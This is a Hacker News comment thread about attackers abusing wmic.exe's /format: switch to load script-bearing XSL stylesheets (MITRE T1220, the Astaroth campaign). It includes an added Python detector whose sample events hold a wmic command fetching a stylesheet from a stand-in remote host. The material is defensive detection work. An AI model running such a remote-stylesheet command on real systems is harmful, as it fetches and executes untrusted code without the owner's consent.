It's worth noting that Windows Defender stops the 'remote include' part even if there's nothing in the file (test.txt only contains the word 'blah', so we should get a parsing/stylesheet error):

https://i.imgur.com/jP3yJNQ.jpg
This story appears to be related to this:

https://news.ycombinator.com/item?id=20384519

More info (with some marketing):

https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
This is something which baffles me as a +15yrs "linux guy" who thought he knew what kind of ecosystem the big desktop OS brings: MS Windows is really rich in tooling, both in terms of desktop and command line tools. And there is similar bloat as with Linux: I had never heard of wmic.exe before, but the fact that it can be used to manage network interfaces sounds just as fucked up as the linux story (/sbin/ifconfig, /sbin/ip, the unloved network manager, resolv.d, etc. pp). Just to give another example: mshta.exe was basically the Electron platform, but in the early 2000s. And it was shipped right out of the box. That's very elegant.

Since I have an addiction to writing tools which solve problems they were not intended to solve (violating the Unix philosophy), I admire that wmic.exe can use XSLT to generate reports. Of course, PowerShell solves the problem of structured output in a better way. A contemporary Unix tool would simply have the option for JSON output and that's it. But including an XSL processor which even executes scripting languages... hilarious!
Before the inevitable anti-XML comments appear: the hole is due to Microsoft making it possible to execute VB code included in what were supposed to be *style*sheets. It's like blindly eval()ing a JSON field: a bad idea regardless of format, and not part of the spec (if I remember correctly).
And here is a MITRE entry:

https://attack.mitre.org/techniques/T1220/
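As an added example of the defender's side of T1220 (this is not code from the thread, from MITRE or from Microsoft): a small Python scanner over process-creation events that flags wmic.exe invocations whose /format: target is a remote URL, a UNC path, a stylesheet outside the stock wbem directory, or a format name that is not one of the stock ones. The event dictionary layout and the sample events are constructed for illustration; the set of stock format keywords is an assumption about a typical install and should be checked against the hosts you monitor.

```python
"""
Detection helper for wmic.exe /format: stylesheet abuse (MITRE ATT&CK T1220).
Added example; not code from the HN thread, MITRE or Microsoft.
The event layout ("pid", "image", "cmdline") and the sample events below are
constructed for illustration.
"""
import re
from urllib.parse import urlparse

# The /format: switch makes wmic.exe load an XSL stylesheet. Its value may be a
# bare format keyword, a local path, a UNC path or a URL (the remote-include case
# that Defender blocked in the thread).
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)

# Stock stylesheets ship under this directory on a default install (assumption).
WBEM_DIR = r"c:\windows\system32\wbem"

# Format keywords that resolve to stock stylesheets in WBEM_DIR (assumed list for
# a typical install; tune it to what is actually present on your hosts).
STOCK_FORMATS = {
    "csv", "hform", "htable", "list", "mof", "rawxml",
    "table", "texttable", "textvaluelist", "value", "xml",
}


def extract_format_target(cmdline):
    """Return the /format: value from a command line, or None if absent."""
    m = FORMAT_RE.search(cmdline)
    return m.group(1) if m else None


def classify_format_target(target):
    """Return a verdict string for a suspicious target, or None if it looks stock."""
    t = target.strip().lower()
    if urlparse(t).scheme in ("http", "https", "ftp"):
        return "remote-xsl"              # stylesheet fetched over the network
    if t.startswith("\\\\"):
        return "unc-xsl"                 # stylesheet on a network share
    if "\\" not in t and "/" not in t:
        # Bare name: either a stock keyword or an unexpected file in the cwd.
        name = t[:-4] if t.endswith(".xsl") else t
        return None if name in STOCK_FORMATS else "unexpected-format-name"
    if t.startswith(WBEM_DIR + "\\") and t.endswith(".xsl"):
        return None                      # explicit path to a stock stylesheet
    return "non-standard-local-xsl"      # any other local path


def scan_events(events):
    """Return findings for wmic.exe events whose /format: target is not stock."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        if image != "wmic.exe" and not image.endswith("\\wmic.exe"):
            continue
        target = extract_format_target(ev.get("cmdline", ""))
        if target is None:
            continue
        verdict = classify_format_target(target)
        if verdict is not None:
            findings.append({"pid": ev["pid"], "verdict": verdict, "target": target})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"https://example.invalid/report.xsl"'},
    {"pid": 102, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get /format:list"},
    {"pid": 103, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic process get /format:"C:\Windows\System32\wbem\htable.xsl"'},
    {"pid": 104, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic process get /format:"C:\Users\Public\report.xsl"'},
    {"pid": 105, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.xsl"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid={f['pid']} verdict={f['verdict']} target={f['target']}")
```

Run it as-is to see the two constructed hits (the remote URL and the stylesheet under C:\Users\Public); the stock `list` keyword and the explicit wbem path are ignored. In practice `scan_events` would be fed from Sysmon or 4688 process-creation records rather than the inline list.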
Why does it run untrusted shortcut files in the first place? That's where you need to block; it's clearly as bad as running executables sent through email.